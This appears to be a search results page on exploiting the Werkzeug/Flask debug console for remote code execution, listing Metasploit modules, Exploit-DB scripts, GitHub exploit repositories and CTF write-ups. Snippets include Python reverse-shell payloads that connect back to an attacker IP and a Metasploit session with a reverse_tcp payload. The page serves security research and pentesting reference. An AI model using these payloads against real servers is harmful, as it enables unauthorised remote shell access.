Rapid7
rapid7.com › db › modules › exploit › multi › http › werkzeug_debug_rce
Pallete Projects Werkzeug Debugger Remote Code ...
Tested against the following Werkzeug versions: - 3.0.3 on Debian 12, Windows 11 and macOS 14.6 - 1.1.4 on Debian 12 - 1.0.1 on Debian 12 - 0.11.5 on Debian 12 - 0.10 on Debian 12 · h00die Graeme Robinson metasploit ... To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': ... The predictive window has collapsed. Exploitation follows disclosure in days.
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%
GitHub
github.com › its-arun › Werkzeug-Debug-RCE
GitHub - its-arun/Werkzeug-Debug-RCE: Python script for exploiting Werkzeug Debug RCE useful for CTF · GitHub
Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.
Starred by 39 users
Forked by 22 users
Languages   Python
Snyk
security.snyk.io › snyk vulnerability database › pip
werkzeug | Snyk
Security vulnerabilities and package health score for pip package werkzeug
GitHub
github.com › Fare9 › PyWerkzeug-Debug-Command-Execution
GitHub - Fare9/PyWerkzeug-Debug-Command-Execution: python exploit for werkzeug debug shell command execution · GitHub
People would say it's based on the MSF exploit (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/werkzeug_debug_rce.rb), but as I couldn't understand that exploit at all, I wrote my own exploit.
Starred by 10 users
Forked by 8 users
Languages   Python
HackTricks
book.hacktricks.xyz › home › network services pentesting › pentesting web › werkzeug
Werkzeug / Flask Debug - HackTricks
However, if the HTTP connection ... GitHub - Ruulian/wconsole_extractor: WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode....
GitHub
github.com › rapid7 › metasploit-framework › blob › master › documentation › modules › exploit › multi › http › werkzeug_debug_rce.md
metasploit-framework/documentation/modules/exploit/multi/http/werkzeug_debug_rce.md at master · rapid7/metasploit-framework
$ msfconsole -q msf > use exploit/multi/http/werkzeug_debug_rce [*] No payload configured, defaulting to python/meterpreter/reverse_tcp msf exploit(multi/http/werkzeug_debug_rce) > set RHOSTS 192.168.23.5 RHOSTS => 192.168.23.5 msf exploit(multi/http/werkzeug_debug_rce) > set LHOST 192.168.23.117 LHOST => 192.168.23.117 msf exploit(multi/http/werkzeug_debug_rce) > set VHOST 127.0.0.1 VHOST => 127.0.0.1 msf exploit(multi/http/werkzeug_debug_rce) > set MACADDRESS 02:42:ac:12:00:04 MACADDRESS => 02:42:ac:12:00:04 msf exploit(multi/http/werkzeug_debug_rce) > set MACHINEID 8d496199-a25e-4340-9c8d-2
Author   rapid7
Exploit-DB
exploit-db.com › exploits › 37814
Werkzeug - Debug Shell Command Execution (Metasploit) - Python remote Exploit
August 18, 2015 - ## # This module requires Metasploit: ... Debug Shell Command Execution', 'Description' => %q{ This module will exploit the Werkzeug debug console to put down a Python shell....
InfosecMatter
infosecmatter.com › home › metasploit module library
Werkzeug Debug Shell Command Execution - Metasploit - InfosecMatter
December 4, 2022 - This module will exploit the Werkzeug debug console to put down a Python shell. This debugger "must never be used on production machines" but sometimes slips past testing. Tested against: 0.9.6 on Debian, 0.9.6 on CentOS, 0.10 on Debian
Medium
shellbr3ak.medium.com › h-cktivitycon-web-88be6514b73
H@cktivitycon — Web - Shellbr3ak - Medium
August 1, 2020 - Essentially, what the exploit does is check whether the debug shell is enabled or not; if it's not, it stops working, and if it is, it just sends a simple reverse shell in Python. Pretty simple, isn't it ;)
Medium
medium.com › swlh › hacking-flask-applications-939eae4bffed
Hacking Flask Applications. Executing arbitrary commands using the… | by Vickie Li | The Startup | Medium
February 18, 2020 - The issue here is not the Werkzeug debugger itself, but an incorrect way of configuring a Werkzeug application: making the debugger available on a production machine. A publicly exposed debugger will subject the machine to remote code execution.
GitHub
github.com › wdahlenburg › werkzeug-debug-console-bypass
GitHub - wdahlenburg/werkzeug-debug-console-bypass: Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. · GitHub
Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. - wdahlenburg/werkzeug-debug-console-bypass
Starred by 64 users
Forked by 7 users
Languages   Python 85.8% | Dockerfile 14.2%
HackTricks
hacktricks.boitatech.com.br › pentesting › pentesting-web › werkzeug
werkzeug | HackTricks - Boitatech
September 30, 2021 - There are also several exploits on the internet, like this one or the one in Metasploit. On some occasions the /console endpoint is going to be protected by a PIN. Here you can find how to generate this PIN: https://www.daehee.com/werkzeug-console-pin-exploit/
Infomation Security
jayngng.github.io › blog › reconstruction-ospg
Reconstruction - OSPG | Infomation Security - Blog
November 8, 2021 - $ nmap --open -sV -A -p- -vv -n ... syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 8080/tcp open http syn-ack ttl 63 Werkzeug httpd 1.0.1 (Python 3.6.9) | http-methods: |_ Supported Methods: HEAD GET OPTIONS |_http-server-header: Werkzeug/1.0.1 Python/3.6.9 ...
GitHub
github.com › MistSpark › Vigilant-Exploits › blob › master › Werkzeug_Exploit.py
Vigilant-Exploits/Werkzeug_Exploit.py at master · MistSpark/Vigilant-Exploits
payload = '''import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('%s',%s));os.dup2(s.fileno(),0);'''\ · '''os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash");s.close();'''%(attackerIP,port)
Author   MistSpark
GitHub
github.com › topics › werkzeug-exploit
werkzeug-exploit · GitHub Topics · GitHub
WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode.
PyPI
pypi.org › project › Werkzeug
Werkzeug · PyPI
Uploaded Apr 2, 2026 Python 3 · Details for the file werkzeug-3.1.8.tar.gz. Download URL: werkzeug-3.1.8.tar.gz · Upload date: Apr 2, 2026 · Size: 875.9 kB · Tags: Source · Uploaded using Trusted Publishing? Yes · Uploaded via: twine/6.1.0 CPython/3.13.7 ·
pip install Werkzeug
Published   Apr 02, 2026
Version   3.1.8
GitHub
github.com › am0nsec › exploit › blob › master › python › werkzeug-debug-console › exploit.py
exploit/python/werkzeug-debug-console/exploit.py at master · am0nsec/exploit
#!/usr/bin/python3 · import requests · import sys · import re · · # lambda · _RED = '\x1b[1;31m' _BLU = '\x1b[1;34m' _GRE = '\x1b[1;32m' _RST = '\x1b[0;0;0m' success_message = lambda x: '{}[+]{} {}'.format(_GRE, _RST, x) error_message = lambda x: '{}[-]{} {}'.format(_RED, _RST, x) info_message = lambda x: '{}[*]{} {}'.format(_BLU, _RST, x) · print(info_message('Searching for the Werkzeug console ...')) ·
Author   am0nsec